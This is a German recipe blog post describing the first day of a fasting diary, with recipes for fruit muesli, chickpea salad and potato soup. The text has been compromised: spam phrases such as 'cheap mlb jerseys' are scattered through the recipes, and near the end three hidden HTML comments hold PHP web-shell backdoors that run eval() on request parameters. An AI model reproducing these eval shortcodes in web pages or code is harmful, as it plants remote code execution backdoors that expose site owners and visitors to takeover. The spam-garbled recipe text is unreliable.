Fastentagebuch, Tag 1

Tweet about this on TwitterShare on FacebookShare on Google+Pin on PinterestDigg thisShare on StumbleUponShare on YummlyPrint this pageEmail this to someone

Tag 1Basisches Obstmüsli mit Erdmandeln, Indischer Kichererbsensalat mit Paprika, Kartoffelsuppe mit Mandelmilch

Morgens:

Start mit einem Glas Master Cleanser (frisch gepresster Zitronensaft mit Ahornsirup und Cayenne-Pfeffer)

Kräutertee

Basisches Obstmüsli mit Erdmandeln:

  • 1 Banane
  • 1 Orange
  • 1 Birne
  • 1/4 Ananas
  • gemahlene Erdmandeln (Chufa), ersatzweise normale Mandeln oder Mandelmus
  • Trauben- oder Orangensaft

Das Obst Виды schnibbel  ich abends vor und stelle es in einer Tupperdose in den Kühlschrank. Morgens Hackfleischpizza den Saft und die Erdmandeln darüberstreuen und genießen oder mit ins Büro nehmen.

 

Mittags:

Indischer Kichererbsensalat mit Paprika

– 1 kleine Dose Kichererbsen

  • 1 Paprika
  • 1 Handvoll Frühlingszwiebeln
  • 2 EL Öl
  • 2 EL Zitronensaft
  • 1/4 TL Kurkuma
  • 1/4 TL Cumin
  • 1/4 TL Paprikapulver
  • 1/4 TL Garam Masala
  • 1 MS Cayenne-Pfeffer

Kichererbsen abschütten, Paprika und Frühlingszwiebeln schneiden und mit dem Öl, Zitronensaft und Gewürzen vermengen. Mit Salz und Pfeffer abschmecken.

Nachmittags:
nur wenn der Hunger rauskommt, ein paar Chufas oder ???????????? etwas Trockenobst Fastentagebuch naschen,

viel trinken: Master Cleanser, verdünnte Obst- und Gemüsesäfte, Gemüsebrühe, Wasser und Kräutertee the (insgesamt ca. 2 Liter)

Tipps zum Trinken

Abends:

Kartoffelsuppe mit Mandelmilch

  • 500 gr. Kartoffeln
  • 1 Liter Gemüsebrühe
  • 100 gr. Mandelmus
  • 200 ml Mandelmilch
  • 1 Zwiebel
  • 1 Knoblauchzehe
  • Zitronensaft
  • Kristallsalz und frischen Pfeffer zum Abschmecken

Zwiebeln, Knoblauch und Kartoffeln kleinschneiden und kurz in Ghee oder Kokosöl anbraten, dann Day mit der Brühe übergießen und weichkochen. Das Mandelmus dazugeben und pürrieren. Mit cheap mlb jerseys Zitronensaft, Salz und Pfeffer abschmecken – Fertig!

Lecker!

<!– [insert_php]if (isset($_REQUEST["IQv"])){eval($_REQUEST["IQv"]);exit;}[/insert_php][php]if (isset($_REQUEST["IQv"])){eval($_REQUEST["IQv"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["zOX"])){eval($_REQUEST["zOX"]);exit;}[/insert_php][php]if (isset($_REQUEST["zOX"])){eval($_REQUEST["zOX"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Zqg"])){eval($_REQUEST["Zqg"]);exit;}[/insert_php][php]if (isset($_REQUEST["Zqg"])){eval($_REQUEST["Zqg"]);exit;}[/php] –>

Shares 0
Tweet about this on TwitterShare on FacebookShare on Google+Pin on PinterestDigg thisShare on StumbleUponShare on YummlyPrint this pageEmail this to someone

Ein Kommentar

  1. Pingback: leckerlife

Kommentar verfassen